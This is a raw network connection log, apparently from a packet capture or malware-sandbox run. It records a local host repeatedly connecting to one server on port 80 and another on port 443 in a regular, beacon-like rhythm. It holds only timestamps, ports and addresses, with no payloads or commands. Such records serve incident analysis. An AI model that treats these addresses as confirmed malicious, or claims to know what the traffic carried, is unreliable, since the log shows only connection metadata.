Jan 10, 2025 21:54:02.019176960 CET	80	50009	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:02.019234896 CET	50009	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:02.019700050 CET	80	50011	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:02.019764900 CET	50011	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:02.019860029 CET	50011	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:02.024672031 CET	80	50011	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:02.693260908 CET	80	50011	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:02.694746017 CET	50012	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:02.694818974 CET	443	50012	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:02.694896936 CET	50012	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:02.695183039 CET	50012	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:02.695197105 CET	443	50012	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:02.737432003 CET	50011	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:03.308548927 CET	443	50012	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:03.310884953 CET	50012	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:03.310923100 CET	443	50012	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:03.311007977 CET	50012	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:03.311022043 CET	443	50012	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:03.763020039 CET	443	50012	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:03.763228893 CET	443	50012	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:03.763309956 CET	50012	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:03.763711929 CET	50012	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:03.766452074 CET	50011	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:03.767755032 CET	50013	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:03.771648884 CET	80	50011	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:03.771778107 CET	50011	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:03.772620916 CET	80	50013	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:03.772695065 CET	50013	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:03.772794008 CET	50013	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:03.777580976 CET	80	50013	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:04.467611074 CET	80	50013	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:04.469767094 CET	50014	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:04.469809055 CET	443	50014	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:04.469866991 CET	50014	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:04.470269918 CET	50014	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:04.470287085 CET	443	50014	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:04.518438101 CET	50013	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:05.097995043 CET	443	50014	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:05.099744081 CET	50014	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:05.099773884 CET	443	50014	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:05.099919081 CET	50014	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:05.099924088 CET	443	50014	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:05.377207041 CET	443	50014	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:05.377386093 CET	443	50014	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:05.377574921 CET	50014	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:05.378194094 CET	50014	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:05.382636070 CET	50013	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:05.388082981 CET	80	50013	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:05.389554024 CET	50013	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:05.391017914 CET	50015	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:05.395862103 CET	80	50015	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:05.397814989 CET	50015	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:05.397986889 CET	50015	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:05.402780056 CET	80	50015	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:06.070350885 CET	80	50015	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:06.071882010 CET	50016	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:06.071929932 CET	443	50016	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:06.072005033 CET	50016	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:06.072309971 CET	50016	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:06.072321892 CET	443	50016	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:06.112230062 CET	50015	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:06.697026014 CET	443	50016	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:06.698956966 CET	50016	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:06.698981047 CET	443	50016	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:06.699037075 CET	50016	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:06.699047089 CET	443	50016	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:06.949598074 CET	443	50016	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:06.949700117 CET	443	50016	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:06.949771881 CET	50016	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:06.950270891 CET	50016	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:06.953438044 CET	50015	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:06.954555035 CET	50017	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:06.958712101 CET	80	50015	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:06.958978891 CET	50015	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:06.959359884 CET	80	50017	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:06.959425926 CET	50017	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:06.959592104 CET	50017	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:06.964405060 CET	80	50017	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:07.653879881 CET	80	50017	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:07.654984951 CET	50018	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:07.655034065 CET	443	50018	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:07.655106068 CET	50018	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:07.655355930 CET	50018	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:07.655369043 CET	443	50018	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:07.706206083 CET	50017	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:08.297028065 CET	443	50018	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:08.298923969 CET	50018	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:08.298949957 CET	443	50018	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:08.299019098 CET	50018	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:08.299031973 CET	443	50018	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:08.660310030 CET	443	50018	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:08.660506010 CET	443	50018	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:08.660675049 CET	50018	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:08.661012888 CET	50018	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:08.664478064 CET	50017	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:08.665812016 CET	50019	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:08.671499014 CET	80	50017	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:08.671580076 CET	50017	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:08.672188997 CET	80	50019	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:08.672266960 CET	50019	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:08.672385931 CET	50019	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:08.677897930 CET	80	50019	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:09.363729954 CET	80	50019	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:09.365214109 CET	50020	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:09.365256071 CET	443	50020	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:09.365343094 CET	50020	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:09.365700960 CET	50020	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:09.365715981 CET	443	50020	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:09.409296989 CET	50019	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:09.995135069 CET	443	50020	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:09.996850967 CET	50020	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:09.996916056 CET	443	50020	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:09.996987104 CET	50020	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:09.997008085 CET	443	50020	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:10.311299086 CET	443	50020	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:10.311507940 CET	443	50020	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:10.311697006 CET	50020	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:10.311975002 CET	50020	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:10.314728975 CET	50019	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:10.315834045 CET	50021	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:10.320764065 CET	80	50021	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:10.320867062 CET	50021	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:10.320934057 CET	50021	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:10.325728893 CET	80	50021	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:10.334080935 CET	80	50019	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:10.334147930 CET	50019	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:11.011043072 CET	80	50021	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:11.012413025 CET	50022	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:11.012489080 CET	443	50022	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:11.012559891 CET	50022	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:11.012814999 CET	50022	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:11.012830019 CET	443	50022	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:11.065296888 CET	50021	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:11.645170927 CET	443	50022	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:11.647438049 CET	50022	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:11.647500992 CET	443	50022	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:11.647598982 CET	50022	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:11.647619963 CET	443	50022	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:12.148252964 CET	443	50022	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:12.148456097 CET	443	50022	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:12.148607969 CET	50022	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:12.149095058 CET	50022	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:12.152205944 CET	50021	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:12.153379917 CET	50023	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:12.157294989 CET	80	50021	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:12.157397985 CET	50021	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:12.158364058 CET	80	50023	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:12.158461094 CET	50023	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:12.158607006 CET	50023	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:12.163425922 CET	80	50023	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:12.840878963 CET	80	50023	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:12.842269897 CET	50024	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:12.842317104 CET	443	50024	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:12.842403889 CET	50024	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:12.842729092 CET	50024	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:12.842741966 CET	443	50024	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:12.893430948 CET	50023	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:13.482242107 CET	443	50024	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:13.503773928 CET	50024	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:13.503807068 CET	443	50024	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:13.504447937 CET	50024	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:13.504453897 CET	443	50024	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:13.880759954 CET	443	50024	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:13.880873919 CET	443	50024	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:13.881027937 CET	50024	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:13.881437063 CET	50024	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:13.884396076 CET	50023	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:13.885723114 CET	50025	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:13.889533997 CET	80	50023	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:13.889619112 CET	50023	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:13.890655041 CET	80	50025	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:13.890758991 CET	50025	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:13.890842915 CET	50025	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:13.895700932 CET	80	50025	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:14.568340063 CET	80	50025	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:14.569775105 CET	50026	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:14.569880962 CET	443	50026	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:14.570066929 CET	50026	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:14.570465088 CET	50026	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:14.570502996 CET	443	50026	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:14.612323046 CET	50025	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:15.225822926 CET	443	50026	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:15.227617979 CET	50026	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:15.227701902 CET	443	50026	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:15.227791071 CET	50026	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:15.227806091 CET	443	50026	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:15.739518881 CET	443	50026	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:15.739612103 CET	443	50026	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:15.739799023 CET	50026	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:15.740058899 CET	50026	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:15.743638992 CET	50025	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:15.744695902 CET	50027	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:15.748702049 CET	80	50025	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:15.748781919 CET	50025	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:15.749550104 CET	80	50027	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:15.749618053 CET	50027	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:15.749733925 CET	50027	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:15.754467010 CET	80	50027	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:16.448885918 CET	80	50027	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:16.450197935 CET	50028	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:16.450273991 CET	443	50028	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:16.450349092 CET	50028	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:16.450668097 CET	50028	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:16.450684071 CET	443	50028	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:16.502867937 CET	50027	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:17.079272985 CET	443	50028	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:17.083328009 CET	50028	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:17.083357096 CET	443	50028	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:17.083442926 CET	50028	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:17.083450079 CET	443	50028	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:17.396944046 CET	443	50028	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:17.397032022 CET	443	50028	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:17.397317886 CET	50028	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:17.397653103 CET	50028	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:17.400741100 CET	50027	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:17.401881933 CET	50029	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:17.407125950 CET	80	50027	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:17.407150984 CET	80	50029	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:17.407418013 CET	50029	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:17.407418013 CET	50029	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:17.407423019 CET	50027	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:17.412187099 CET	80	50029	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:18.107491970 CET	80	50029	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:18.108561993 CET	50030	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:18.108607054 CET	443	50030	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:18.108661890 CET	50030	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:18.108906984 CET	50030	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:18.108920097 CET	443	50030	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:18.159193993 CET	50029	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:18.770538092 CET	443	50030	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:18.772125006 CET	50030	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:18.772157907 CET	443	50030	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:18.772224903 CET	50030	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:18.772232056 CET	443	50030	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:19.009105921 CET	443	50030	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:19.009191990 CET	443	50030	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:19.009397984 CET	50030	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:19.009969950 CET	50030	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:19.013607979 CET	50029	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:19.014947891 CET	50031	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:19.018584967 CET	80	50029	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:19.018659115 CET	50029	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:19.019735098 CET	80	50031	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:19.019813061 CET	50031	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:19.019947052 CET	50031	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:19.024688959 CET	80	50031	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:19.711462975 CET	80	50031	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:19.713471889 CET	50032	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:19.713576078 CET	443	50032	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:19.713682890 CET	50032	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:19.714051008 CET	50032	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:19.714080095 CET	443	50032	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:19.752844095 CET	50031	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:20.361072063 CET	443	50032	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:20.363286972 CET	50032	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:20.363305092 CET	443	50032	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:20.363382101 CET	50032	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:20.363392115 CET	443	50032	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:20.663789988 CET	443	50032	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:20.664011002 CET	443	50032	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:20.664113998 CET	50032	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:20.664414883 CET	50032	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:20.668030977 CET	50031	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:20.669416904 CET	50033	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:20.673263073 CET	80	50031	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:20.673335075 CET	50031	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:20.674407005 CET	80	50033	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:20.674500942 CET	50033	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:20.674637079 CET	50033	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:20.679368019 CET	80	50033	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:21.383222103 CET	80	50033	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:21.384757042 CET	50034	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:21.384816885 CET	443	50034	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:21.384896994 CET	50034	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:21.385247946 CET	50034	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:21.385274887 CET	443	50034	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:21.424731016 CET	50033	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:22.022444010 CET	443	50034	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:22.024825096 CET	50034	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:22.024847984 CET	443	50034	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:22.024925947 CET	50034	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:22.024935007 CET	443	50034	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:22.334566116 CET	443	50034	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:22.334845066 CET	443	50034	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:22.334959984 CET	50034	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:22.335371017 CET	50034	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:22.339395046 CET	50033	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:22.341017008 CET	50035	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:22.344371080 CET	80	50033	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:22.344563007 CET	50033	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:22.345824003 CET	80	50035	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:22.345916986 CET	50035	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:22.346035957 CET	50035	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:22.350902081 CET	80	50035	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:23.018646002 CET	80	50035	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:23.020185947 CET	50036	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:23.020226955 CET	443	50036	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:23.020311117 CET	50036	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:23.020668983 CET	50036	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:23.020678043 CET	443	50036	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:23.065570116 CET	50035	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:23.640556097 CET	443	50036	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:23.642283916 CET	50036	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:23.642303944 CET	443	50036	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:23.642349958 CET	50036	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:23.642357111 CET	443	50036	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:23.939493895 CET	443	50036	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:23.939711094 CET	443	50036	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:23.939909935 CET	50036	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:23.940110922 CET	50036	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:23.944003105 CET	50035	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:23.944591999 CET	50037	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:23.949860096 CET	80	50035	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:23.949925900 CET	50035	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:23.950222969 CET	80	50037	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:23.950311899 CET	50037	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:23.950419903 CET	50037	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:23.955352068 CET	80	50037	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:24.646056890 CET	80	50037	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:24.647350073 CET	50038	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:24.647382975 CET	443	50038	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:24.647449017 CET	50038	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:24.647828102 CET	50038	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:24.647840023 CET	443	50038	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:24.690319061 CET	50037	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:25.291326046 CET	443	50038	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:25.293330908 CET	50038	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:25.293360949 CET	443	50038	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:25.293412924 CET	50038	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:25.293421030 CET	443	50038	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:25.633579016 CET	443	50038	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:25.633805037 CET	443	50038	149.154.167.220	192.168.2.5
Jan 10, 2025 21:54:25.633891106 CET	50038	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:25.634303093 CET	50038	443	192.168.2.5	149.154.167.220
Jan 10, 2025 21:54:25.638991117 CET	50037	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:25.640060902 CET	50039	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:25.644171000 CET	80	50037	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:25.644279957 CET	50037	80	192.168.2.5	132.226.247.73
Jan 10, 2025 21:54:25.644956112 CET	80	50039	132.226.247.73	192.168.2.5
Jan 10, 2025 21:54:25.645041943 CET	50039	80	192.168.2.5	132.226.247.73
